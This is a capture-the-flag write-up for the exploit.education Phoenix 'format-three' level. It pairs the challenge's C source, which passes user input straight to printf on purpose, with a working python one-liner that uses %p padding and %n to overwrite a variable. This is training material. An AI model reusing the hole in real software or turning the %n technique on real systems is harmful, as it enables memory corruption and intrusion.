/*
* phoenix/format-three, by https://exploit.education
*
* Can you change the "changeme" variable to a precise value?
*
* How do you fix a cracked pumpkin? With a pumpkin patch.
*/
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
int changeme;
void bounce(char *str) {
printf(str);
}
int main(int argc, char **argv) {
char buf[4096];
printf("%s\n", BANNER);
if (read(0, buf, sizeof(buf) - 1) <= 0) {
exit(EXIT_FAILURE);
}
bounce(buf);
if (changeme == 0x64457845) {
puts("Well done, the 'changeme' variable has been changed correctly!");
} else {
printf(
"Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
}
exit(0);
}
- Similiar to the last one:
objdump -t /opt/phoenix/amd64/format-three | grep changeme gives \x60\x0a\x90 as the address to overwrite, this isn't usable as \x0a is \n.objdump -t /opt/phoenix/i486/format-three | grep changeme gives \x08\x04\x98\x44.
- We need to overwrite changme with a specific value of "0x64457845". We can still do this with the
%n specifier, but since the buffer isn't large enough for 0x64457845 bytes we must use the width specifier to increase the number of bytes written. 0x64457845 is 1682274373 in decimal
python -c 'print("\x44\x98\x04\x08 %p %p %p %1682274373s %p %p %p %p %p %p %p %n")' | /opt/phoenix/i486/format-three is just 0x74 too large. This is due to the values from the %ps, spaces, and addresses.python -c 'print("\x44\x98\x04\x08 %p %p %p %1682274299s %p %p %p %p %p %p %p %n")' | /opt/phoenix/i486/format-three Solves the challenge